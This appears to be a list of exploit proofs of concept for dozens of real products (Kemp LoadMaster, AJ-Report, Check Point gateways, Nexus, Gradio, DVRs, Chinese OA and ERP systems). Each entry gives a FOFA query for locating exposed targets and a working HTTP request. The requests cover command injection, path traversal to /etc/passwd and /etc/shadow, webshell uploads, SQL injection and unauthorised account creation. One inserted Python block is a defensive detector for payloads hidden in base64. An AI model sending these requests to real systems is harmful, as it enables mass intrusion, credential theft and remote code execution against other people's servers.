CNVD-2024-02175
FOFA:app="MajordomoSL"
GET /modules/thumb/thumb.php?url=cnRzcDovL2EK&debug=1&transport=%7C%7C+%28echo+%27%5BS%5D%27%3B+id%3B+echo+%27%5BE%5D%27%29%23%3B HTTP/1.1
Host: x.x.x.x
User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/92.0.4515.159 Safari/537.36 Edg/92.0.902.84
Accept-Charset: utf-8
Accept-Encoding: gzip, deflate
Connection: close

147. RaidenMAILD mail server v4.9.4 path traversal
CVE-2024-32399
FOFA:body="RaidenMAILD"
GET /webeditor/../../../windows/win.ini HTTP/1.1
Host: 127.0.0.1:81
Cache-Control: max-age=0
Connection: close

148. CrushFTP authentication bypass and template injection
CVE-2024-4040
FOFA:body="CrushFTP"
PAYLOAD

149. AJ-Report open-source data dashboard remote command execution
FOFA:title="AJ-Report"

POST /dataSetParam/verification;swagger-ui/ HTTP/1.1
Host: x.x.x.x
User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/121.0.0.0 Safari/537.36
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,image/apng,*/*;q=0.8,application/signed-exchange;v=b3;q=0.7
Accept-Encoding: gzip, deflate, br
Accept-Language: zh-CN,zh;q=0.9
Content-Type: application/json;charset=UTF-8
Connection: close

{"ParamName":"","paramDesc":"","paramType":"","sampleItem":"1","mandatory":true,"requiredFlag":1,"validationRules":"function verification(data){a = new java.lang.ProcessBuilder(\"ipconfig\").start().getInputStream();r=new java.io.BufferedReader(new java.io.InputStreamReader(a));ss='';while((line = r.readLine()) != null){ss+=line};return ss;}"}

150. AJ-Report 1.4.0 authentication bypass and remote code execution
FOFA:title="AJ-Report"
POST /dataSetParam/verification;swagger-ui/ HTTP/1.1
Host: x.x.x.x
User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/121.0.0.0 Safari/537.36
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,image/apng,*/*;q=0.8,application/signed-exchange;v=b3;q=0.7
Accept-Encoding: gzip, deflate, br
Accept-Language: zh-CN,zh;q=0.9
Content-Type: application/json;charset=UTF-8
Connection: close
Content-Length: 339

{"ParamName":"","paramDesc":"","paramType":"","sampleItem":"1","mandatory":true,"requiredFlag":1,"validationRules":"function verification(data){a = new java.lang.ProcessBuilder(\"id\").start().getInputStream();r=new java.io.BufferedReader(new java.io.InputStreamReader(a));ss='';while((line = r.readLine()) != null){ss+=line};return ss;}"}

151. AJ-Report 1.4.1 pageList SQL injection
FOFA:title="AJ-Report"
GET /;swagger-ui/dataSource/pageList?showMoreSearch=false&pageNumber=1&pageSize=10 HTTP/1.1
Host: x.x.x.x
User-Agent: Mozilla/5.0 (Macintosh; Intel Mac OS X 10_14_3) AppleWebKit/605.1.15 (KHTML, like Gecko) Version/12.0.3 Safari/605.1.15
Connection: close
Accept-Encoding: gzip

152. Progress Kemp LoadMaster remote command execution
CVE-2024-1212
LoadMaster <= 7.2.59.2 (GA)
LoadMaster <= 7.2.54.8 (LTSF)
LoadMaster <= 7.2.48.10 (LTS)
FOFA:body="LoadMaster"
JztsczsnOmRvZXNub3RtYXR0ZXI= is the base64 encoding of ';ls;':doesnotmatter, i.e. the injected command sits in the username half of the Basic credentials
GET /access/set?param=enableapi&value=1 HTTP/1.1
Host: x.x.x.x
User-Agent: Mozilla/5.0 (Macintosh; Intel Mac OS X 10_15_0) AppleWebKit/604.1 (KHTML, like Gecko) Version/9.1.2 Safari/604.1
Connection: close
Accept: */*
Accept-Language: en
Authorization: Basic JztsczsnOmRvZXNub3RtYXR0ZXI=
Accept-Encoding: gzip

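Several entries in this section hide the injected payload behind base64: the sql parameter in entry 122, the system parameter in entry 144, the url parameter in entry 146, and the Basic credentials in this entry. A log reviewer or WAF rule that inspects only the raw value sees nothing. The block below is an added example, not code from the page or from any of these vendors: given a request target and its headers it decodes every base64-looking query value and the Basic credentials, and flags decoded text that contains shell metacharacters, a bare command, or SQL keywords. The sample requests are reconstructed from the entries named; the keyword lists are assumptions chosen for this illustration.

```python
import base64
import binascii
import re
from urllib.parse import urlsplit, unquote, unquote_plus

B64_RE = re.compile(r"[A-Za-z0-9+/]+={0,2}")
# Assumed indicator lists for this illustration; tune them to your environment.
SHELL_META = re.compile(r"[;`|&$]")
CMD_WORDS = re.compile(r"^\s*(id|ls|cat|whoami|uname|wget|curl|sh|bash|nc)\b")
SQL_KW = re.compile(r"\b(select|union|sleep|database|version|updatexml|extractvalue)\b", re.I)


def try_b64(value: str):
    """Decode value as base64 text; None if it is not plausible base64 or
    does not decode to printable UTF-8."""
    s = value.strip()
    if len(s) < 4 or len(s) % 4 == 1 or not B64_RE.fullmatch(s):
        return None
    s += "=" * (-len(s) % 4)            # tolerate stripped padding (entry 144)
    try:
        text = base64.b64decode(s, validate=True).decode("utf-8")
    except (binascii.Error, UnicodeDecodeError):
        return None
    if not all(c.isprintable() or c.isspace() for c in text):
        return None
    return text


def flag(text: str):
    """Classify decoded text; None when nothing in the lists matches."""
    if SHELL_META.search(text):
        return "shell-metachar"
    if CMD_WORDS.search(text):
        return "command"
    if SQL_KW.search(text):
        return "sql"
    return None


def inspect_request(target: str, headers: dict):
    """Return (name, layer, value, flag) findings for one request."""
    findings = []
    for pair in urlsplit(target).query.split("&"):
        if "=" not in pair:
            continue
        name, _, raw = pair.partition("=")
        plain = unquote_plus(raw)
        if flag(plain):
            findings.append((name, "raw", plain, flag(plain)))
        decoded = try_b64(unquote(raw))  # unquote, not unquote_plus: '+' is a base64 digit
        if decoded is not None:
            findings.append((name, "base64", decoded, flag(decoded)))
    auth = headers.get("Authorization", "")
    if auth.startswith("Basic "):
        creds = try_b64(auth[len("Basic "):])
        if creds is not None:
            user = creds.partition(":")[0]   # report the user half only
            findings.append(("Authorization", "basic-auth", user, flag(user)))
    return findings


# Constructed samples reconstructed from entries 122, 144, 146 and 152.
SAMPLES = [
    ("/importexport.php?sql=c2VsZWN0IDEsZGF0YWJhc2UoKSx2ZXJzaW9uKCk=&type=exportexcelbysql", {}),
    ("/cgi-bin/nas_sharing.cgi?user=mydlinkBRionyg&passwd=YWJjMTIzNDVjYmE&cmd=15&system=aWQ=", {}),
    ("/modules/thumb/thumb.php?url=cnRzcDovL2EK&debug=1&transport="
     "%7C%7C+%28echo+%27%5BS%5D%27%3B+id%3B+echo+%27%5BE%5D%27%29%23%3B", {}),
    ("/access/set?param=enableapi&value=1", {"Authorization": "Basic JztsczsnOmRvZXNub3RtYXR0ZXI="}),
]

if __name__ == "__main__":
    for target, headers in SAMPLES:
        for name, layer, value, verdict in inspect_request(target, headers):
            print(f"{target.split('?')[0]:32} {name:14} {layer:10} {verdict or '-':15} {value!r}")
```

Decoded values are reported even when no list matches (the passwd value in entry 144, the rtsp URL in entry 146), because the analyst usually wants to see what was hidden regardless of whether a keyword fired.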
153. Gradio arbitrary file read
CVE-2024-1561
FOFA:body="__gradio_mode__"
Step 1: request /config to obtain the component ids
http://x.x.x.x/config


Step 2: have the server copy /etc/passwd into a temporary file
POST /component_server HTTP/1.1
Host: x.x.x.x
User-Agent: Mozilla/5.0 (Macintosh; Intel Mac OS X 10_15_7) AppleWebKit/605.1.15 (KHTML, like Gecko) Version/14.1.3 Safari/605.1.15 Ddg/14.1.3
Connection: close
Content-Length: 115
Content-Type: application/json
Accept-Encoding: gzip

{"component_id": "1","data": "/etc/passwd","fn_name": "move_resource_to_block_cache","session_hash": "aaaaaaaaaaa"}


Step 3: fetch the cached copy
http://x.x.x.x/file=/tmp/gradio/ ... 8cdf49755073/passwd

154. Tianwell (天维尔) fire rescue operations dispatch platform SQL injection
CVE-2024-3720
FOFA:body="天维尔信息科技股份有限公司" && title=="登入"
POST /twms-service-mfs/mfsNotice/page HTTP/1.1
Host: x.x.x.x
Content-Length: 106
Cache-Control: max-age=0
Upgrade-Insecure-Requests: 1
Origin: http://x.x.x.x
Content-Type: application/json
User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/118.0.0.0 Safari/537.36
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,image/apng,*/*;q=0.8,application/signed-exchange;v=b3;q=0.7
Referer: http://x.x.x.x/twms-service-mfs/mfsNotice/page
Accept-Encoding: gzip, deflate
Accept-Language: zh-CN,zh;q=0.9,en-US;q=0.8,en;q=0.7
Connection: close

{"currentPage":1,"pageSize":19,"query":{"gsdwid":"1f95b3ec41464ee8b8f223cc41847930') AND 7120=(SELECT 7120 FROM PG_SLEEP(5)) AND ('dZAi'='dZAi"},"hgubmt748n4":"="}

155. LyLme Spage (六零导航页) file.php arbitrary file upload
CVE-2024-34982
FOFA:title=="上网导航 - LyLme Spage"
POST /include/file.php HTTP/1.1
Host: x.x.x.x
User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:125.0) Gecko/20100101 Firefox/125.0
Connection: close
Content-Length: 232
Accept: application/json, text/javascript, */*; q=0.01
Accept-Encoding: gzip, deflate, br
Accept-Language: zh-CN,zh;q=0.8,zh-TW;q=0.7,zh-HK;q=0.5,en-US;q=0.3,en;q=0.2
Content-Type: multipart/form-data; boundary=---------------------------qttl7vemrsold314zg0f
X-Requested-With: XMLHttpRequest

-----------------------------qttl7vemrsold314zg0f
Content-Disposition: form-data; name="file"; filename="test.php"
Content-Type: image/png

<?php phpinfo();unlink(__FILE__);?>
-----------------------------qttl7vemrsold314zg0f--

Access the file path returned in the response, e.g. http://x.x.x.x/files/upload/img_664ab7fd14d2c.php

156. TBK DVR-4104/DVR-4216 OS command injection
CVE-2024-3721
FOFA:"Location: /login.rsp"
·TBK DVR-4104
·TBK DVR-4216
curl "http://<dvr_host>:<port>/device.rsp?opt=sys&cmd=___S_O_S_T_R_E_A_MAX___&mdb=sos&mdc=<URL_ENCODED_SHELL_COMMAND>" -H "Cookie: uid=1"


POST /device.rsp?opt=sys&cmd=___S_O_S_T_R_E_A_MAX___&mdb=sos&mdc=echo%3B%20echo%20asrgkjh0%20%3E%20%2Fvar%2Fexample.txt%3B%20ls%20-l%20%2Fvar%3B%20echo%20----------------%3B%20cat%20%2Fvar%2Fexample.txt%3B HTTP/1.1
Host: x.x.x.x
User-Agent: Mozilla/5.0 (Macintosh;T2lkQm95X0c= Intel Mac OS X 10_14_3) AppleWebKit/605.1.15 (KHTML, like Gecko) Version/12.0.3 Safari/605.1.15
Connection: close
Content-Length: 0
Cookie: uid=1
Accept-Encoding: gzip


157. 美特CRM upload.jsp arbitrary file upload
CNVD-2023-06971
FOFA:body="/common/scripts/basic.js"
POST /develop/systparam/softlogo/upload.jsp?key=null&form=null&field=null&filetitle=null&folder=null HTTP/1.1
Host: x.x.x.x
User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/124.0.0.0 Safari/537.36
Content-Length: 709
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,image/apng,*/*;q=0.8,application/signed-exchange;v=b3;q=0.7
Accept-Encoding: gzip, deflate
Accept-Language: zh-CN,zh;q=0.9
Cache-Control: max-age=0
Connection: close
Content-Type: multipart/form-data; boundary=----WebKitFormBoundary1imovELzPsfzp5dN
Upgrade-Insecure-Requests: 1

------WebKitFormBoundary1imovELzPsfzp5dN
Content-Disposition: form-data; name="file"; filename="kjldycpvjrm.jsp"
Content-Type: application/octet-stream

nyhelxrutzwhrsvsrafb
------WebKitFormBoundary1imovELzPsfzp5dN
Content-Disposition: form-data; name="key"

null
------WebKitFormBoundary1imovELzPsfzp5dN
Content-Disposition: form-data; name="form"

null
------WebKitFormBoundary1imovELzPsfzp5dN
Content-Disposition: form-data; name="field"

null
------WebKitFormBoundary1imovELzPsfzp5dN
Content-Disposition: form-data; name="filetitile"

null
------WebKitFormBoundary1imovELzPsfzp5dN
Content-Disposition: form-data; name="filefolder"

null
------WebKitFormBoundary1imovELzPsfzp5dN--


http://x.x.x.x/userfile/default/userlogo/kjldycpvjrm.jsp

158. Mura CMS processAsyncObject SQL injection
CVE-2024-32640
FOFA:"Generator: Masa CMS"
POST /index.cfm/_api/json/v1/default/?method=processAsyncObject HTTP/1.1
Host: {{Hostname}}
Content-Type: application/x-www-form-urlencoded

object=displayregion&contenthistid=x\'&previewid=1


159. 英飞达 medical image archiving and communication system WebJobUpload arbitrary file upload
FOFA:"INFINITT" && (icon_hash="1474455751"|| icon_hash="702238928")
POST /webservices/WebJobUpload.asmx HTTP/1.1
Host: x.x.x.x
User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/118.0.0.0 Safari/537.36
Content-Length: 1080
Accept-Encoding: gzip, deflate
Connection: close
Content-Type: text/xml; charset=utf-8
Soapaction: "http://rainier/jobUpload"

<?xml version="1.0" encoding="utf-8"?>
<soap:Envelope xmlns:xsi="http://www.w3.org/2001/XMLSchema-instance" xmlns:xsd="http://www.w3.org/2001/XMLSchema" xmlns:soap="http://schemas.xmlsoap.org/soap/envelope/">
<soap:Body>
<jobUpload xmlns="http://rainier">
<vcode>1</vcode>
<subFolder></subFolder>
<fileName>abcrce.asmx</fileName>
<bufValue>PAYLOAD</bufValue>
</jobUpload>
</soap:Body>
</soap:Envelope>


/1/abcrce.asmx/Cmdshell?Pass=Response.Write("Hello,World")


160. Sonatype Nexus Repository 3 directory traversal and file read
CVE-2024-4956
FOFA:title="Nexus Repository Manager"
GET /%2F%2F%2F%2F%2F%2F%2F..%2F..%2F..%2F..%2F..%2F..%2F..%2Fetc%2Fpasswd HTTP/1.1
Host: x.x.x.x
User-Agent: Mozilla/5.0 (Windows NT 5.1; rv:21.0) Gecko/20100101 Firefox/21.0
Connection: close
Accept: */*
Accept-Language: en
Accept-Encoding: gzip


161. 科拓全智能停车收费系统 Webservice.asmx arbitrary file upload
FOFA:body="/KT_Css/qd_defaul.css"
Step 1: upload the file. The <fileName> field sets the file name and the <fileFlow> field the file content, which must be base64-encoded.
POST /Webservice.asmx HTTP/1.1
Host: x.x.x.x
User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/106.0.5249.62 Safari/537.36
Connection: close
Content-Length: 445
Content-Type: text/xml
Accept-Encoding: gzip

<?xml version="1.0" encoding="utf-8"?>
<soap:Envelope xmlns:xsi="http://www.w3.org/2001/XMLSchema-instance" xmlns:xsd="http://www.w3.org/2001/XMLSchema" xmlns:soap="http://schemas.xmlsoap.org/soap/envelope/">
<soap:Body>
<UploadResume xmlns="http://tempuri.org/">
<ip>1</ip>
<fileName>../../../../dizxdell.aspx</fileName>
<fileFlow>andqbmFnc3phc3d1ZGh0bmhwYXc=</fileFlow>
<tag>3</tag>
</UploadResume>
</soap:Body>
</soap:Envelope>


http://x.x.x.x/dizxdell.aspx

162. 和丰多媒体信息发布系统 QH.aspx arbitrary file upload
FOFA: app="和丰山海-数字标牌"
POST /QH.aspx HTTP/1.1
Host: x.x.x.x
User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:109.0) Gecko/20100101 Firefox/114.0
Connection: close
Content-Length: 583
Content-Type: multipart/form-data; boundary=----WebKitFormBoundaryeegvclmyurlotuey
Accept-Encoding: gzip

------WebKitFormBoundaryeegvclmyurlotuey
Content-Disposition: form-data; name="fileToUpload"; filename="kjuhitjgk.aspx"
Content-Type: application/octet-stream

<% response.write("ujidwqfuuqjalgkvrpqy") %>
------WebKitFormBoundaryeegvclmyurlotuey
Content-Disposition: form-data; name="action"

upload
------WebKitFormBoundaryeegvclmyurlotuey
Content-Disposition: form-data; name="responderId"

ResourceNewResponder
------WebKitFormBoundaryeegvclmyurlotuey
Content-Disposition: form-data; name="remotePath"

/opt/resources
------WebKitFormBoundaryeegvclmyurlotuey--


http://x.x.x.x/opt/resources/kjuhitjgk.aspx

163. 号卡极团分销管理系统 ue_serve.php arbitrary file upload
FOFA: icon_hash="-795291075"
POST /admin/controller/ue_serve.php?action=image&encode=utf-8 HTTP/1.1
Host: x.x.x.x
User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/106.0.5249.62 Safari/537.36
Connection: close
Content-Length: 293
Accept: */*
Accept-Encoding: gzip, deflate
Accept-Language: zh-CN,zh;q=0.9
Content-Type: multipart/form-data; boundary=----iiqvnofupvhdyrcoqyuujyetjvqgocod

------iiqvnofupvhdyrcoqyuujyetjvqgocod
Content-Disposition: form-data; name="name"

1.php
------iiqvnofupvhdyrcoqyuujyetjvqgocod
Content-Disposition: form-data; name="upfile"; filename="1.php"
Content-Type: image/jpeg

rvjhvbhwwuooyiioxega
------iiqvnofupvhdyrcoqyuujyetjvqgocod--


164. 慧校园(安校易)管理系统 FileUpProductupdate.aspx arbitrary file upload
FOFA: title="智慧综合管理平台登入"
POST /Module/FileUpPage/FileUpProductupdate.aspx HTTP/1.1
Host: x.x.x.x
User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:99.0) Gecko/20100101 Firefox/99.0
Content-Length: 288
Accept: application/json, text/javascript, */*; q=0.01
Accept-Language: zh-CN,zh;q=0.8,zh-TW;q=0.7,zh-HK;q=0.5,en-US;q=0.3,en;q=0.2
Connection: close
Content-Type: multipart/form-data; boundary=----dqdaieopnozbkapjacdbdthlvtlyl
X-Requested-With: XMLHttpRequest
Accept-Encoding: gzip

------dqdaieopnozbkapjacdbdthlvtlyl
Content-Disposition: form-data; name="Filedata"; filename="qaz.aspx"
Content-Type: image/jpeg

<%@Page Language="C#"%><%Response.Write("aitwpovoxwtgixpfqiys");System.IO.File.Delete(Request.PhysicalPath);%>
------dqdaieopnozbkapjacdbdthlvtlyl--


http://x.x.x.x/Upload/Publish/000000/0_0_0_0/update.aspx

165. OrangeHRM 3.3.3 SQL injection
CVE-2024-36428
FOFA: app="OrangeHRM-产品"
URL:https://192.168.1.28/symfony/web ... e&sortOrder=ASC,(SELECT (CASE WHEN (5240=5240) THEN 1 ELSE 5240*(SELECT 5240 FROM INFORMATION_SCHEMA.PLUGINS) END))


166. 中成科信票务管理平台 SeatMapHandler SQL injection
FOFA:body="技术支持:北京中成科信科技发展有限公司"
POST /SystemManager/Comm/SeatMapHandler.ashx HTTP/1.1
Host:
Pragma: no-cache
Cache-Control: no-cache
Upgrade-Insecure-Requests: 1
User-Agent: Mozilla/5.0 (Macintosh; Intel Mac OS X 10_15_7) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/124.0.0.0 Safari/537.36
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,image/apng,*/*;q=0.8,application/signed-exchange;v=b3;q=0.7
Accept-Encoding: gzip, deflate
Accept-Language: zh-CN,zh;q=0.9,en;q=0.8
Cookie: ASPSESSIONIDCCRBRCTD=LHLBDIBAKDEGBCJGKIKMNODE
Connection: close
Content-Type: application/x-www-form-urlencoded
Content-Length: 89

Method=GetZoneInfo&solutionNo=%27+AND+4172+IN+%28SELECT+%28CHAR%28104%29%2BCHAR%28101%29%2BCHAR%28108%29%2BCHAR%28108%29%2BCHAR%28111%29%29%29--+bErE


167. 精益价值管理系统 DownLoad.aspx arbitrary file read
FOFA:body="/ajax/LVS.Core.Common.STSResult,LVS.Core.Common.ashx"
GET /Business/DownLoad.aspx?p=UploadFile/../Web.Config HTTP/1.1
Host:
User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/70.0.3538.77 Safari/537.36
Content-Type: application/x-www-form-urlencoded
Accept-Encoding: gzip, deflate
Accept: */*
Connection: keep-alive


168. 宏景EHR OutputCode arbitrary file read
FOFA:app="HJSOFT-HCM"
GET /servlet/OutputCode?path=VHmj0PAATTP2HJBPAATTPcyRcHb6hPAATTP2HJFPAATTP59XObqwUZaPAATTP2HJBPAATTP6EvXjT HTTP/1.1
Host: your-ip
User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/89.0.4389.90 Safari/537.36
Content-Type: application/x-www-form-urlencoded
Connection: close


169. 宏景EHR downlawbase SQL injection
FOFA:app="HJSOFT-HCM"
GET /templates/attestation/../../selfservice/lawbase/downlawbase?id=1';WAITFOR+DELAY+'0:0:5'--+ HTTP/1.1
Host: your-ip
User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/70.0.3538.77 Safari/537.36
Accept: */*
Accept-Encoding: gzip, deflate
Connection: close


170. 宏景EHR DisplayExcelCustomReport arbitrary file read
FOFA:body="/general/sys/hjaxmanage.js"
POST /templates/attestation/../../servlet/DisplayExcelCustomReport HTTP/1.1
Host: balalanengliang
User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/70.0.3538.77 Safari/537.36
Content-Type: application/x-www-form-urlencoded

filename=../webapps/ROOT/WEB-INF/web.xml


171. 通天星CMSV6车载定位监控平台 SQL injection
FOFA:body="/808gps/"
GET /run_stop/delete.do;downloadLogger.action?ids=1)+AND+(SELECT+5394+FROM+(SELECT(SLEEP(5)))tdpw)--+&loadAll=1 HTTP/1.1
Host: your-ip
User-Agent: Mozilla/5.0 (Macintosh; Intel Mac OS X 10.15; rv:109.0) Gecko/20100101 Firefox/110.0
Accept: */*
Accept-Language: zh-CN,zh;q=0.8,zh-TW;q=0.7,zh-HK;q=0.5,en-US;q=0.3,en;q=0.2
Accept-Encoding: gzip, deflate
Connection: close


172. DT-高清车牌识别摄像机 arbitrary file read
FOFA:app="DT-高清车牌识别摄像机"
GET /../../../../etc/passwd HTTP/1.1
Host: your-ip
User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/70.0.3538.77 Safari/537.36
Accept-Encoding: gzip, deflate
Accept: */*
Connection: keep-alive


173. Check Point security gateway arbitrary file read
CVE-2024-24919
FOFA:app="Check_Point-SSL-Network-Extender"
POST /clients/MyCRL HTTP/1.1
Host: your-ip
Content-Type: application/x-www-form-urlencoded

aCSHELL/../../../../../../../etc/shadow


174. 金和OA C6 FileDownLoad.aspx arbitrary file read
FOFA:app="金和网络-金和OA"
GET /c6/JHSoft.Web.CustomQuery/FileDownLoad.aspx?FilePath=../Resource/JHFileConfig.ini HTTP/1.1
Host: your-ip
User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/120.0.0.0 Safari/537.36
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,image/apng,*/*;q=0.8,application/signed-exchange;v=b3;q=0.7
Accept-Encoding: gzip, deflate, br
Accept-Language: zh-CN,zh;q=0.9
Connection: close


175. 金和OA C6 IncentivePlanFulfill.aspx SQL injection
FOFA:app="金和网络-金和OA"
GET /C6/JHSoft.Web.IncentivePlan/IncentivePlanFulfill.aspx/?IncentiveID=1%20WAITFOR%20DELAY%20'0:0:5'--&TVersion=1 HTTP/1.1
Host:
User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/120.0.0.0 Safari/537.36
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,*/*;q=0.8
Accept-Language: zh-CN,zh;q=0.8,zh-TW;q=0.7,zh-HK;q=0.5,en-US;q=0.3,en;q=0.2
Accept-Encoding: gzip, deflate
Connection: close
Upgrade-Insecure-Requests: 1


176. 电信网关配置管理系统 rewrite.php file upload
FOFA:body="img/login_bg3.png" && body="系统登录"
POST /manager/teletext/material/rewrite.php HTTP/1.1
Host: your-ip
User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:125.0) Gecko/20100101 Firefox/125.0
Content-Type: multipart/form-data; boundary=----WebKitFormBoundaryOKldnDPT
Connection: close

------WebKitFormBoundaryOKldnDPT
Content-Disposition: form-data; name="tmp_name"; filename="test.php"
Content-Type: image/png

<?php system("cat /etc/passwd");unlink(__FILE__);?>
------WebKitFormBoundaryOKldnDPT
Content-Disposition: form-data; name="uploadtime"


------WebKitFormBoundaryOKldnDPT--


177. H3C router sensitive information disclosure
/userLogin.asp/../actionpolicy_status/../ER8300G2.cfg
/userLogin.asp/../actionpolicy_status/../M60.cfg
/userLogin.asp/../actionpolicy_status/../GR8300.cfg
/userLogin.asp/../actionpolicy_status/../GR5200.cfg
/userLogin.asp/../actionpolicy_status/../GR3200.cfg
/userLogin.asp/../actionpolicy_status/../GR2200.cfg
/userLogin.asp/../actionpolicy_status/../ER8300G2-X.cfg
/userLogin.asp/../actionpolicy_status/../ER8300G2.cfg
/userLogin.asp/../actionpolicy_status/../ER6300G2.cfg
/userLogin.asp/../actionpolicy_status/../ER5200G2.cfg
/userLogin.asp/../actionpolicy_status/../ER5200.cfg
/userLogin.asp/../actionpolicy_status/../ER5100.cfg
/userLogin.asp/../actionpolicy_status/../ER3260G2.cfg
/userLogin.asp/../actionpolicy_status/../ER3260.cfg
/userLogin.asp/../actionpolicy_status/../ER3200G2.cfg
/userLogin.asp/../actionpolicy_status/../ER3200.cfg
/userLogin.asp/../actionpolicy_status/../ER3108GW.cfg
/userLogin.asp/../actionpolicy_status/../ER3108G.cfg
/userLogin.asp/../actionpolicy_status/../ER3100G2.cfg
/userLogin.asp/../actionpolicy_status/../ER3100.cfg
/userLogin.asp/../actionpolicy_status/../ER2200G2.cfg


178. H3C校园网自助服务系统 flexFileUpload arbitrary file upload
FOFA:header="/selfservice"
POST /imc/primepush/%2e%2e/flexFileUpload HTTP/1.1
Host:
User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/89.0.4389.114 Safari/537.36
Content-Length: 252
Accept-Encoding: gzip, deflate
Connection: close
Content-Type: multipart/form-data; boundary=---------------aqutkea7vvanpqy3rh2l

-----------------aqutkea7vvanpqy3rh2l
Content-Disposition: form-data; name="12234.txt"; filename="12234"
Content-Type: application/octet-stream
Content-Length: 255

12234
-----------------aqutkea7vvanpqy3rh2l--


GET /imc/primepush/%2e%2e/flex/12234.txt


179. 建文工程管理系统 arbitrary file read
POST /Common/DownLoad2.aspx HTTP/1.1
Host: {{Hostname}}
Content-Type: application/x-www-form-urlencoded
User-Agent: Mozilla/5.0

path=../log4net.config&Name=


180. 帮管客 CRM jiliyu SQL injection
FOFA:app="帮管客-CRM"
GET /index.php/jiliyu?keyword=1&page=1&pai=id&sou=soufast&timedsc=激励语列表&xu=and%201=(updatexml(1,concat(0x7e,(select%20user()),0x7e),1)) HTTP/1.1
Host: your-ip
User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/121.0.0.0 Safari/537.36
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,image/apng,*/*;q=0.8,application/signed-exchange;v=b3;q=0.7
Accept-Encoding: gzip, deflate
Accept-Language: zh-CN,zh;q=0.9
Connection: close


181. 润申信息科技企业标准化管理系统 UpdataLogHandler.ashx SQL injection
FOFA:"PDCA/js/_publicCom.js"
POST /PDCA/ashx/UpdataLogHandler.ashx HTTP/1.1
Host: your-ip
User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/123.0.0.0 Safari/537.36
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,image/apng,*/*;q=0.8,application/signed-exchange;v=b3;q=0.7
Accept-Encoding: gzip, deflate, br
Accept-Language: zh-CN,zh;q=0.9
Connection: close
Content-Type: application/x-www-form-urlencoded

action=GetAll&start=' WAITFOR DELAY '0:0:5'--&end=&code=11&type=2&page=1&rows=20


182. 润申科技企业标准化管理系统 AddNewsHandler.ashx arbitrary user creation
FOFA:"PDCA/js/_publicCom.js"
POST /PDCA/ashx/AddNewsHandler.ashx?action=Adduser HTTP/1.1
Host: your-ip
User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/123.0.0.0 Safari/537.36
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,image/apng,*/*;q=0.8,application/signed-exchange;v=b3;q=0.7
Accept-Encoding: gzip, deflate, br
Accept-Language: zh-CN,zh;q=0.9
Connection: close
Content-Type: application/x-www-form-urlencoded

username=test1234&pwd=test1234&savedays=1


183. 广州图创图书馆集群管理系统 updOpuserPw SQL injection
FOFA:body="interlib/common/" || body="Interlib图书馆集群管理系统" || body="/interlib3/system_index" || body="打开Interlib主界面"
GET /interlib3/service/sysop/updOpuserPw?loginid=admin11&newpassword=Aa@123456&token=1%27and+ctxsys.drithsx.sn(1,(select%20111111*111111%20from%20dual))=%272 HTTP/1.1
Host: your-ip
User-Agent: Mozilla/5.0 (Linux; Android 11; motorola edge 20 fusion) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/101.0.4951.61 Mobile Safari/537.36
Accept-Charset: utf-8
Accept-Encoding: gzip, deflate
Connection: close


184. 迅饶科技 X2Modbus gateway AddUser arbitrary user addition
FOFA:server="SunFull-Webs"
POST /soap/AddUser HTTP/1.1
Host: your-ip
Accept-Encoding: gzip, deflate
User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:125.0) Gecko/20100101 Firefox/125.0
